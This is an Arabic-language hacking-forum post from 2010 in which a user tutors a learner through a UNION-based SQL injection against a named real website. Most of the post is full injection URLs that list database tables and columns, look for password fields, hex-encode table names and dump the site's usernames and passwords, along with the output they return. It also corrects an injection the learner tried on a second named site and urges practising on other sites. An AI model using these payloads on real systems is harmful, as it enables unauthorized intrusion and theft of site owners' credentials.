:: vBspiders Professional Network :: - عرض مشاركة واحدة

Dr.NaNo · 07-18-2010, 10:31 PM

نبدا.:

عدد االاعمدة المصابه .: 5

نوع اصدار قاعدة البيانات .: 5

http://www.cdvdcenter.com/zcat.php?i...on%28%29,4,5--

شوف الخطـأ طلع لك فووق في راس الصفحه في التوتيل ..

تمام ..

الان لحظ جداول الباسورد في هذا الرابط ...:

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(table_name,0x3a,column_name,0x3a, table_schema),4,5+from+information_schema.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--

member:pass:sidividice_cdvd
user:pass:sidividice_cdvd
لو تلاحط اني اضفت امر . group_ قبل كلمه ..Concat ؛ << في الحقنه ..

شوف الرابط الي فوق تبع الاستفسار الاول تبعك وبتعرف وش اقصد ..بإمر group_

لان هذا الامر بستخرج لك جميع الجداول ..

نتابع الحقنه .:

الان ناخذ من جداول الباسورد الي فوق ..ناخذ عمود user ونشفره ..بموقع .:

http://www.waraxe.us/sql-char-encoder.html

بعد التشفير بكون هيك الامر كامل في الموقع .:

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(table_name,0x3a,column_name,0x3a, table_schema),4,5+from+information_schema.columns+ where+table_name=0x75736572--

وهذه الاعمدة تبع اليوزر .:

user:id:sidividice_cdvd
user:user:sidividice_cdvd
user:pass:sidividice_cdvd

لاحظ في الرابط فوق تبع الحقنه يوجد امر group_ >> !! قلت لك الامر يجب في اي حقنه تستخدمه لكي تعرف الجداول ..

نكمل الان ونستخرج معلومات صاحب الموقع .:

لاحظ هنا الرابط .:

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(user,0x3a,pass),4,5+from+user--

سوف تجد اليوزر والباسورد تبع الموقع ..

لكن اليوزر لم يظهر لم اعرف لماذا ..

لكن اذا لم يظهر اذهب الى اعمدت الباسورد ..:

member:pass:sidividice_cdvd

وشفر كلمه
member ..

لان احنا فوق شفرنا كلمت user لكن لم يظهر اليوزر والباسورد معنا .

الان شفر كلمه memder وإن شاء الله يظهر معااك .. اليوزر والباسورد .

ملاحظــــة .:

لو تلاحظ في الرابط هذا تبعك ..:

http://www.arzuntarin.com/zcat.php?i...schema.columns

شوف خطــأ كبير عملته ياغالي ..

وهو انك جعلت امر information_schema.columns بعد كلمه from

وهكذا سوف يأتيك خطأ في الرابط ..

والصحيح هو اضافه بعد كلمت from عند استخراج اليوزر والباسورد ..

تضع بعد كلمه from الاسم الذي شفرته في موقع .:

http://www.waraxe.us/sql-char-encoder.html

شوف الرابط الصحيح هنا ..

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(user,0x3a,pass),4,5+from+user--

هكذا انا اقصد ..

إن شاء الله انك فهمتني وانا عارف انك لخبطت كثيررر وإحنا كنا مثلك نلخبط.

لكن ارجع اقولك ،، لا تستعجل في تحميل الدروس او الدورة كامله ..

في اليوم حمل درس .. وتابعه زيين زيين وطبق ...

واذا لم يضبط معك موقع [ ضعه جانبأآ في مفكره ] واستخدم موقع اخر ..

وهكذا . وإن شاء الله تحترف اخي الغالي ...

ملاحضـــة ايضــأ. :

ركز جيدأأ في الاوامر . الي بالحقن .. عشان تعرف كيف تستخرج اليوزر والباسورد.

تحياتي لك ..

اخوك .:

Dr.NaNo

بالتوفيق لك . اخي الغالي .